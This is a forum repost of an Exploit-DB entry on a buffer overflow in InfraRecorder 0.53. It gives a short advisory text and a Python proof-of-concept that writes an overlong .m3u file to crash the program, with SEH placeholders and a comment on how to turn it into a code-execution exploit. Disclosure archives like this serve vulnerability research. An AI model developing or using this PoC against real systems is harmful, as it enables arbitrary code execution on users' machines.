Exploit InfraRecorder - '.m3u' File Buffer Overflow (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
39329
Проверка EDB
  1. Пройдено
Автор
OSANDA MALITH JAYATHISSA
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
null
Дата публикации
2014-05-25
InfraRecorder - '.m3u' File Buffer Overflow (PoC)
Код:
source: https://www.securityfocus.com/bid/67076/info

InfraRecorder is prone a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts likely result in denial-of-service conditions.

InfraRecorder 0.53 is vulnerable; other versions may also be affected. 

#!/usr/bin/python
# Exploit Title: InfraRecorder Unicode Buffer Overflow
# Version: version 0.53
# Download: http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download
# Tested on: Windows XP sp2
# Exploit Author: Osanda Malith 
'''
We can overwrite the nseh and seh handlers. If you find a valid unicode ppr address
you can build a successful exploit.
'''
'''
Click Edit -> Import -> import our buffer
'''
junk = "A"*262
nseh = "BB"
seh = "CC"
junk2 = "D"*20000
file=open("Exploit.m3u","w")
file.write(junk)
file.close()
#EOF
 
Источник
www.exploit-db.com

Похожие темы